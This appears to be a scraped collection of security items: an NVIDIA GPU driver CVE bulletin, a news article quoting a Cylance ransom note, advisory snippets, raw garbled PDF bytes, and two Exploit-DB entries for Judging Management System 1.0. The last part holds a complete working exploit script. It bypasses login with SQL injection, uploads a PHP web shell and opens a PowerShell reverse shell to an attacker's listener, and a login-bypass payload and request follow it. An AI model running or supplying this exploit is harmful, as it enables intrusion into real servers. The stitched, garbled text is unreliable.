NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where improper restriction of operations within the bounds of a memory buffer can lead to denial of service, information disclosure, and data tampering.

**Details**

This section provides a summary of potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors use CVSS v3.1 standards.

**NVIDIA GPU Display Driver**

CVE ID

Description

Base Score

CWE and Vector

CVE-2023-0189

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer handler, which may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.

8.8

CWE: 822  
AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE‑2023‑0184

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, which may lead to denial of service, escalation of privileges, information disclosure, and data tampering.

8.8

CWE: 822  
AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE-2023-0182

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer, where an out-of-bounds write can lead to denial of service, information disclosure, and data tampering.

7.8

CWE-787  
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2023-0181

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in a kernel mode layer handler, where memory permissions are not correctly checked, which may lead to denial of service and data tampering.

7.1

CWE: 280  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVE-2023-0191

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, where an out-of-bounds access may lead to denial of service or data tampering.

7.1

CWE: 119  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVE-2023-0183

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an out-of-bounds write can lead to denial of service and data tampering.

7.1

CWE-787  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVE-2023-0180

NVIDIA GPU Display Driver for Linux contains a vulnerability in a kernel mode layer handler, which may lead to denial of service or information disclosure.

7.1

CWE: 125  
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

CVE-2023-0185

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where sign conversion issues may lead to denial of service or information disclosure.

6.7

CWE: 196  
AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:H

CVE-2023-0198

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where improper restriction of operations within the bounds of a memory buffer can lead to denial of service, information disclosure, and data tampering.

6.6

CWE: 119  
AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H

CVE-2023-0187

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, where an out-of-bounds read can lead to denial of service.

6.1

CWE: 125  
AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H

CVE-2023-0199

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, where an out-of-bounds write can lead to denial of service and data tampering.

6.1

CWE: 787  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

CVE-2023-0186

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer, where an out-of-bounds write can lead to denial of service and data tampering.

6.1

CWE-787  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

CVE-2023-0190

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where a NULL pointer dereference may lead to denial of service.

5.5

CWE: 476  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2023-0188

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer handler, where an unprivileged user can cause an out-of-bounds read, which may lead to denial of service.

5.5

CWE: 119  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2023-0192

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer handler, where improper privilege management can lead to escalation of privileges and information disclosure.

4.7

CWE-269  
AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:L

CVE-2023-0194

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer driver, where an invalid display configuration may lead to denial of service.

2.0

CWE: 1284  
AV:P/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2023-0195

NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer driver, where an invalid display configuration may lead to information disclosure.

2.0

CWE: 1284  
AV:P/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

**NVIDIA vGPU Software**

CVE ID

Description

Base Score

CWE and Vector

CVE‑2023‑0197

NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager, where a malicious user in a guest VM can cause a NULL-pointer dereference, which may lead to denial of service.

5.5

CWE: 476  
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends consulting a security or IT professional to evaluate the risk to your specific configuration.

**Security Updates for NVIDIA GPU Display Driver****CVE IDs Addressed in Each Windows Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

Windows Driver Branch

CVE IDs Addressed

R530, R525

CVE-2023-0184, CVE-2023-0182, CVE-2023-0191, CVE-2023-0181, CVE-2023-0199, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0192, CVE-2023-0194, CVE-2023-0195

R515

CVE-2023-0184, CVE-2023-0182, CVE-2023-0191, CVE-2023-0181, CVE-2023-0199, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

R470

CVE-2023-0184, CVE-2023-0191, CVE-2023-0181, CVE-2023-0199, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

R450

CVE-2023-0184, CVE-2023-0191, CVE-2023-0199, CVE-2023-0186, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

**Security Updates for NVIDIA GPU Windows Display Driver**

The following table lists the NVIDIA software products affected, Windows driver versions affected, and the updated version available from nvidia.com that includes this security update. Download the updates from the NVIDIA Driver Downloads page.

Software Product

Operating System

Driver Branch

Affected Driver Versions

Updated Driver Version

GeForce

Windows

R530

All driver versions prior to 531.41

531.41

Windows 10 and 11

R470

All drivers versions prior to 474.30 for support of GeForce Kepler desktop

474.30

Windows 7 and 8._x_

R470

All driver versions prior to 474.30

474.30

Studio

Windows

R530

All driver versions prior to 531.41

531.41

R525

All driver versions prior to 528.89

528.89

NVIDIA RTX, Quadro, NVS

  
Windows

R530

All driver versions prior to 531.41

531.41

R525

All driver versions prior to 528.89

528.89

R515

All driver versions prior to 518.03

518.03

R470

All driver versions prior to 474.30

474.30

Tesla

Windows

R525

All driver versions prior to 528.89

528.89

R515

All driver versions prior to 518.03

518.03

R470

All driver versions prior to 474.30

474.30

R450

All driver versions prior to 454.14

454.14

**CVE IDs Addressed in Each Linux Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux driver branch.

Linux Driver Branch

CVE IDs Addressed

R530, R525, R515

CVE-2023-0184, CVE-2023-0189, CVE-2023-0180, CVE-2023-0183, CVE-2023-0185, CVE-2023-0187, CVE-2023-0198, CVE-2023-0199, CVE-2023-0188, CVE-2023-0190, CVE-2023-0194, CVE-2023-0195, CVE-2023-0191

R470

CVE-2023-0184, CVE-2023-0189, CVE-2023-0180, CVE-2023-0185, CVE-2023-0187, CVE-2023-0198, CVE-2023-0199, CVE-2023-0188, CVE-2023-0190, CVE-2023-0194, CVE-2023-0195, CVE-2023-0191

R450

CVE-2023-0184, CVE-2023-0189, CVE-2023-0180, CVE-2023-0185, CVE-2023-0198, CVE-2023-0199, CVE-2023-0188, CVE-2023-0190, CVE-2023-0194, CVE-2023-0195, CVE-2023-0191

**Security Updates for NVIDIA GPU Linux Display Driver**

The following table lists the NVIDIA software products affected, Linux driver versions affected, and the updated version available from nvidia.com that includes this security update. Download the updates from the NVIDIA Driver Downloads page.

Software Product

Operating System

Driver Branch

Affected Driver Versions

Updated Driver Version

GeForce

Linux

R530

All driver versions prior to 530.41.03

530.41.03

R525

All driver versions prior to 525.105.17

525.105.17

R515

All driver versions prior to 515.105.01

515.105.01

R470

All driver versions prior to 470.182.03

470.182.03

NVIDIA RTX, Quadro, NVS

  
Linux

R530

All driver versions prior to 530.41.03

530.41.03

R525

All driver versions prior to 525.105.17

525.105.17

R515

All driver versions prior to 515.105.01

515.105.01

R470

All driver versions prior to 470.182.03

470.182.03

Tesla

Linux

R525

All driver versions prior to 525.105.17

525.105.17

R515

All driver versions prior to 515.105.01

515.105.01

R470

All driver versions prior to 470.182.03

470.182.03

R450

All driver versions prior to 450.236.01

450.236.01

**Notes:**

*   Your computer hardware vendor may provide you with Windows GPU display driver versions including 531.30, 528.59, 518.01, and 474.26, which also contain the security updates.
*   The tables above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, upgrade to the latest branch release.

**Security Updates for NVIDIA vGPU Software****CVE IDs Addressed in Each Windows vGPU Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

Windows Driver Branch

CVE IDs Addressed

R525

CVE-2023-0182, CVE-2023-0191, CVE-2023-0181, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

R470

CVE-2023-0191, CVE-2023-0181, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

R450

CVE-2023-0191, CVE-2023-0186, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

**CVE IDs Addressed in Each Linux vGPU Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux vGPU driver branch

Linux Driver Branch

CVE IDs Addressed

R525

CVE-2023-0189, CVE-2023-0191, CVE-2023-0180, CVE-2023-0183, CVE-2023-0198, CVE-2023-0188

R470

CVE-2023-0181, CVE-2023-0189, CVE-2023-0191, CVE-2023-0180, CVE-2023-0198

R450

CVE-2023-0189, CVE-2023-0191, CVE-2023-0180, CVE-2023-0198

**CVE IDs Addressed in Each vGPU Manager Driver Branch**

The following table lists the CVE IDs addressed by the update in each vGPU Manager driver branch

vGPU Manager Driver Branch

CVE IDs Addressed

R525

CVE-2023-0197, CVE-2023-0191, CVE-2023-0180, CVE-2023-0183, CVE-2023-0198, CVE-2023-0188, CVE-2023-0185, CVE-2023-0181 , CVE-2023-0192

R470

CVE-2023-0181, CVE-2023-0191, CVE-2023-0180, CVE-2023-0198, CVE-2023-0185

R450

CVE-2023-0191, CVE-2023-0180, CVE-2023-0198, CVE-2023-0185

**Affected Products, Affected Versions, and Updated Versions**

The following table lists NVIDIA software products affected, versions affected, and the updated version that includes this security update.

CVE IDs Addressed

Software Product

Operating System

Affected Versions

Updated Version

vGPU Software

Driver

vGPU Software

Driver

CVE‑2023‑0182  
CVE‑2023‑0191  
CVE‑2023‑0181  
CVE‑2023‑0186  
CVE‑2023‑0187  
CVE‑2023‑0188  
CVE‑2023‑0194  
CVE‑2023‑0195

vGPU software (guest driver)

Windows

All versions prior to and including 15.1

528.24

15.2

528.89

All versions prior to and including 13.6

474.14

13.7

474.30

All versions prior to and including 11.11

454.02

11.12

454.14

CVE-2023-0189  
CVE‑2023‑0191  
CVE‑2023‑0180  
CVE‑2023‑0181  
CVE‑2023‑0183  
CVE‑2023‑0198  
CVE‑2023‑0188

vGPU software (guest driver)

Linux

All versions prior to and including 15.1

525.85.05

15.2

525.105.17

All versions prior to and including 13.6

470.161.03

13.7

470.182.03

All versions prior to and including 11.11

450.216.04

11.12

450.236.01

CVE-2023-0197  
CVE‑2023‑0191  
CVE‑2023‑0180  
CVE‑2023‑0181  
CVE‑2023‑0183  
CVE‑2023‑0185  
CVE‑2023‑0198  
CVE‑2023‑0188  
CVE‑2023‑0192

vGPU software (Virtual GPU Manager)

Citrix Hypervisor,  
VMware vSphere, Red Hat Enterprise Linux KVM

All versions prior to and including 15.1

525.85.07

15.2

525.105.14

All versions prior to and including 13.6

470.161.02

13.7

470.182.02

All versions prior to and including 11.11

450.216.04

11.12

450.236.03

**Notes:**

*   The table above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, upgrade to the latest branch release.

**Security Updates for NVIDIA Cloud Gaming****CVE IDs Addressed in Each Windows Cloud Gaming Driver Branch**

The following table lists the CVE IDs addressed by the update in each Windows driver branch.

Windows Driver Branch

CVE IDs Addressed

R525

CVE-2023-0182, CVE-2023-0191, CVE-2023-0181, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

R470

CVE-2023-0191, CVE-2023-0181, CVE-2023-0186, CVE-2023-0187, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

R450

CVE-2023-0191, CVE-2023-0186, CVE-2023-0188, CVE-2023-0194, CVE-2023-0195

**CVE IDs Addressed in Each Linux Cloud Gaming Driver Branch**

The following table lists the CVE IDs addressed by the update in each Linux Cloud Gaming driver branch

Linux Driver Branch

CVE IDs Addressed

R525

CVE-2023-0189, CVE-2023-0191, CVE-2023-0180, CVE-2023-0183, CVE-2023-0198, CVE-2023-0188, CVE-2023-0181

R470

CVE-2023-0181, CVE-2023-0189, CVE-2023-0191, CVE-2023-0180, CVE-2023-0198

R450

CVE-2023-0189, CVE-2023-0191, CVE-2023-0180, CVE-2023-0198

**CVE IDs Addressed in Each Cloud Gaming Manager Driver Branch**

The following table lists the CVE IDs addressed by the update in each Cloud Gaming Manager driver branch

vGPU Manager Driver Branch

CVE IDs Addressed

R525

CVE-2023-0197, CVE-2023-0191, CVE-2023-0180, CVE-2023-0183, CVE-2023-0198, CVE-2023-0188, CVE-2023-0185, CVE-2023-0181, CVE-2023-0192

R470

CVE-2023-0181, CVE-2023-0191, CVE-2023-0180, CVE-2023-0198, CVE-2023-0185

R450

CVE-2023-0191, CVE-2023-0180, CVE-2023-0198, CVE-2023-0185

The following table lists the NVIDIA software products affected, versions affected, and the updated version that includes this security update.

CVE IDs Addressed

Software Product

Operating System

Affected Versions

Updated Version

Cloud Gaming Software

Driver

Cloud Gaming Software

Driver

CVE‑2023‑0182  
CVE‑2023‑0191  
CVE‑2023‑0181  
CVE‑2023‑0186  
CVE‑2023‑0187  
CVE‑2023‑0188  
CVE‑2023‑0194  
CVE‑2023‑0195

NVIDIA Cloud Gaming (guest driver)

Windows

All versions prior to and including February 2023 release

All versions prior to 528.49

March 2023 release

531.41

CVE‑2023‑0189  
CVE‑2023‑0191  
CVE‑2023‑0180  
CVE‑2023‑0181  
CVE‑2023‑0183  
CVE‑2023‑0198  
CVE‑2023‑0188

NVIDIA Cloud Gaming (guest driver)

Linux

All versions prior to and including February 2023 release

All versions prior to 525.89.02

March 2023 release

530.41.03

CVE‑2023‑0197  
CVE‑2023‑0191  
CVE‑2023‑0180  
CVE‑2023‑0181  
CVE‑2023‑0183  
CVE‑2023‑0185  
CVE‑2023‑0198  
CVE‑2023‑0188  
CVE‑2023‑0192

NVIDIA Cloud Gaming (Virtual GPU Manager)

Red Hat Enterprise Linux KVM

All versions prior to and including February 2023 release

All versions prior to 525.89.02

March 2023 release

530.41.03

**Acknowledgements**

NVIDIA thanks the following people for reporting the issues to us:

CVE-2023-0194, CVE-2023-0195: Imre Kis

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

March 30, 2023

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Frequently Asked Questions (FAQs)**

How do I determine which NVIDIA display driver version is currently installed on my PC?

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2023-0198: NVIDIA Support

By Waqas
For now, Cylance ransomware is still in its early stages, yet it has already claimed several victims.
This is a post from HackRead.com Read the original post: New Cylance Ransomware Targets Linux and Windows, Warn Researchers

Do not confuse Cylance Ransomware with the Blackberry-owned Cylance cybersecurity company.

The cybersecurity researchers at Palo Alto Networks Unit 42 have discovered a new strain of Cylance Ransomware, which has already claimed several victims. Researchers noticed it early Friday morning, and further probing revealed that it is targeting Linux and Windows devices.

As of now, insufficient information is available about Cylance Ransomware, indicating that it is a relatively recent emergence. The ransom note received by victims was published by Unit 42 which contains the attackers’ email addresses, but surprisingly not the ransom amount. Here is the content of the ransom note:

“All your files are encrypted, and currently unusable, but you need to follow our instructions. Otherwise, you can’t return your data (never. It’s just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities – nobody will cooperate with us. It’s not in our interests.”

“To check the ability of returning files, we decrypt one file for free. That is our guarantee. If you will not cooperate with our service – for us, it does not matter. But you will lose time and data, cause just we have the private key. time is more valuable than money.”

It is believed that the amount will be disclosed to the victim when they contact the attacker. The attackers have warned against any attempt to restore or change the files, as it would destroy the private key, which means the data will be lost forever.

**Attack Methodology**

In a tweet, researchers explained that the modus operandi of the ransomware attack involves encrypting files and appending them with a “.Cylance” extension. In addition, a text file titled “Read Me” is added to all encrypted files’ folders. This file contains the attacker’s ransom note.

**Who is Distributing Cylance Ransomware?**

For your information, Cylance is actually a cybersecurity company owned by BlackBerry Ltd. The company is known for mitigating and preventing ransomware attacks on enterprise organizations. However, why threat actors named the ransomware after this company is unclear, or it could be that they are looking for extra attention or to negatively impact Cylance in the long run.

Although Cylance ransomware is still in its early stages, it will be crucial to monitor its targets and wait for more information from the infosec community. Currently, samples of the ransomware are available on MalwareBazaar, a project by abuse.ch that shares malware samples with the infosec community, AV vendors, and threat intelligence providers.

1.  95.6% of Malware in 2022 Targeted Windows
2.  Lessons from Holy Ghost ransomware attacks
3.  CryWiper poses as ransomware to target Russia
4.  Royal Ransomware: New Threat Uses Google Ads
5.  Alert against AXLocker, Octocrypt, Alice ransomware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

New Cylance Ransomware Targets Linux and Windows, Warn Researchers

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between March 24 and March 31. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for March 24 to March 31

Improper Input Validation vulnerability in ABB AC500 V2 PM5xx allows Client-Server Protocol Manipulation.This issue affects AC500 V2: from 2.0.0 before 2.8.6.

%PDF-1.4 %���� 1 0 obj << /Author (Ben Schroeter) /CreationDate (D:20230330131957+03'00') /Creator (PDF-XChange Office Addin) /CreatorTool (PDF-XChange Standard \$9.4 build 363\$ \[GDI\] \[Windows 10 Enterprise x64 \$Build 19044\$\]) /ModDate (D:20230330132003+03'00') /Producer (PDF-XChange Standard \$9.4 build 363\$ \[GDI\] \[Windows 10 Enterprise x64 \$Build 19044\$\]) /Subject (AC500 V2) /Title (Cyber Security Advisory) >> endobj 2 0 obj << /Metadata 3 0 R /Outlines 4 0 R /Pages 5 0 R /Type /Catalog >> endobj 3 0 obj << /Length 3495 /Subtype /XML /Type /Metadata >> stream application/pdf Cyber Security Advisory AC500 V2 Ben Schroeter uuid:a57b4ba8-a272-4bde-add4-d27b2fe96f47 uuid:5b146c0d-1d52-43f0-9222-20a70987ad69 PDF-XChange Office Addin 2023-03-30T13:19:57+03:00 2023-03-30T13:20:03+03:00 PDF-XChange Standard (9.4 build 363) \[GDI\] \[Windows 10 Enterprise x64 (Build 19044)\] PDF-XChange Standard (9.4 build 363) \[GDI\] \[Windows 10 Enterprise x64 (Build 19044)\] endstream endobj 4 0 obj << /Count 28 /First 6 0 R /Last 7 0 R >> endobj 5 0 obj << /Count 7 /Kids \[8 0 R 9 0 R 10 0 R 11 0 R 12 0 R 13 0 R 14 0 R\] /Type /Pages >> endobj 6 0 obj << /A << /D \[9 0 R /XYZ 64 749.5 0\] /S /GoTo >> /C \[0 0 0\] /Next 15 0 R /Parent 4 0 R /Title (Purpose) >> endobj 7 0 obj << /A << /D \[14 0 R /XYZ 64 315.5 0\] /S /GoTo >> /C \[0 0 0\] /Parent 4 0 R /Prev 16 0 R /Title (Revision history) >> endobj 8 0 obj << /Contents 17 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 9 0 obj << /Contents 21 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 10 0 obj << /Annots \[23 0 R 24 0 R 25 0 R 26 0 R 27 0 R 28 0 R\] /Contents 29 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 11 0 obj << /Contents 30 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 12 0 obj << /Annots \[31 0 R\] /Contents 32 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 13 0 obj << /Contents 33 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 14 0 obj << /Annots \[34 0 R 35 0 R 36 0 R 37 0 R 38 0 R 39 0 R 40 0 R 41 0 R 42 0 R\] /Contents 43 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 15 0 obj << /A << /D \[9 0 R /XYZ 64 445 0\] /S /GoTo >> /C \[0 0 0\] /Next 44 0 R /Parent 4 0 R /Prev 6 0 R /Title (Affected products) >> endobj 16 0 obj << /A << /D \[14 0 R /XYZ 64 424.5 0\] /S /GoTo >> /C \[0 0 0\] /Next 7 0 R /Parent 4 0 R /Prev 45 0 R /Title (Support) >> endobj 17 0 obj << /Filter /FlateDecode /Length 3036 >> stream xڍYK��F��WԱ{1d��Wn������E��#Q#&��%)�N~��Mr;Hv��z~U�t,�L^����;��y\]��u�yg�)a{Jp�R�G���zI���ͳ���7����i�,��V�U���" �6s�\*�V�,�7P����,����ϊj�����v���yFZ�Α�KY�1�9��3:�!��u���Yf&ÜϺ��D��:&��uN+v�'X�E� "?M���:�=S1B�)~����u�y9Y;H)�Gp�BPQ���)8Jv� MI� (ȽdFND !r�fA�ZP�����Oy2f�5�+S�����M��rjٷ%� �%P�3<�F�Z|�8۔ ,!9�r�rO�UҘp���A-,q�0���i���H9�-11��h+a��jށ�dm���"��2�� �����|�䋒�( �@f�hg�W�A.U�\[@$d�W+JE�\*�$�\[A!�\\S��(�,��:\\:Ia�Q�A�ܯ%��պZ�Ha'3�ż�\`4a^��+i-�9҂����hռ�4����H?\\P!)��FJi��.�a� ��;G�q��� V¿ �| v��R� �\[ �4o��2�803�+��z-A��{L�^��ū8�<��\[���c�\_e\\�kK�:>�^σ�S\]�r^��r�1���a�/x��^���i�+��\\OK\_�i�0�5�+���q\\\[�a�I��

CVE-2022-3192

Judging Management System version 1.0 suffers from bypass and remote shell upload vulnerabilities.

# Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE)# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP serverimport requests,argparse,re,time,base64import urllib.parsefrom colorama import (Fore as F,Back as B,Style as S)from bs4 import BeautifulSoupBANNER = """╔═══════════════════════════════════════════════════════════════════════════════════════════════════════╗║ Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) ║╚═══════════════════════════════════════════════════════════════════════════════════════════════════════╝"""def argsetup(): desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)' parser = argparse.ArgumentParser(description=desc) parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True) parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True) parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True) args = parser.parse_args() return args# Performs Auth bypass in order to get the admin cookiedef auth_bypass(args): print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...") session = requests.Session() loginUrl = f"{args.target}/login.php" username = """' OR 1=1-- -""" password = "randomvalue1234" data = {'username': username, 'password': password} login = session.post(loginUrl,verify=False,data=data) admin_cookie = login.cookies['PHPSESSID'] print(F.GREEN+"[+] Admin cookies obtained !!!") return admin_cookie# Checks if the file has been uploaded to /uploads directorydef check_file(args,cookie): uploads_endpoint = f"{args.target}/uploads/" cookies = {'PHPSESSID': f'{cookie}'} req = requests.get(uploads_endpoint,verify=False,cookies=cookies) soup = BeautifulSoup(req.text,features='html.parser') files = soup.find_all("a") for i in range (len(files)): match = re.search(".*-shelljudgesystem\.php",files[i].get('href')) if match: file = files[i].get('href') print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file) return file return Nonedef file_upload(args,cookie): now = int(time.time()) endpoint = f"{args.target}/edit_organizer.php" cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'} get_req = requests.get(endpoint,verify=False,cookies=cookies) soup = BeautifulSoup(get_req.text,features='html.parser') username = soup.find("input",{"name":"username"}).get('value') admin_password = soup.find("input",{"id":"password"}).get('value') print(F.GREEN + "[+] Admin username: " + username) print(F.GREEN + "[+] Admin password: " + admin_password) # Multi-part request file_dict = { 'fname':(None,"Random"), 'mname':(None,"Random"), 'lname':(None,"Random"), 'email':(None,"ranom@mail.com"), 'pnum':(None,"014564343"), 'cname':(None,"Random"), 'caddress':(None,"Random"), 'ctelephone':(None,"928928392"), 'cemail':(None,"company@mail.com"), 'cwebsite':(None,"http://company.com"), 'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"), 'username':(None,f"{admin_password}"), 'passwordx':(None,f"{admin_password}"), 'password2x':(None,f"{admin_password}"), 'password':(None,f"{admin_password}"), 'update':(None,"") } req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict)def exploit(args,cookie,file): payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """ uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}" cookies = {'PHPSESSID': f'{cookie}'} print(F.GREEN + "\n[+] Enjoy your reverse shell ") requests.get(uploads_endpoint,verify=False,cookies=cookies) if __name__ == '__main__': print(F.CYAN + BANNER) args = argsetup() cookie=auth_bypass(args=args) file_upload(args=args,cookie=cookie) file_name=check_file(args=args,cookie=cookie) if file_name is not None: exploit(args=args,cookie=cookie,file=file_name) else: print(F.RED + "[!] File not found")

Judging Management System 1.0 Shell Upload

Judging Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for login bypass.

    # Exploit Title: Judging Management System v1.0 - Authentication Bypass# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP server# Vulnerability: An attacker can bypass login page and access to dashboard page# Vulnerable file: login.php# Exploit:1) Go to: http://localhost/php-jms/index.php2) As username use this payload: 'or 1=1-- -3) Use random words for passwordPOST /php-jms/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 37Origin: http://localhostConnection: closeReferer: http://localhost/php-jms/index.phpCookie: wp-settings-time-1=1669938282; 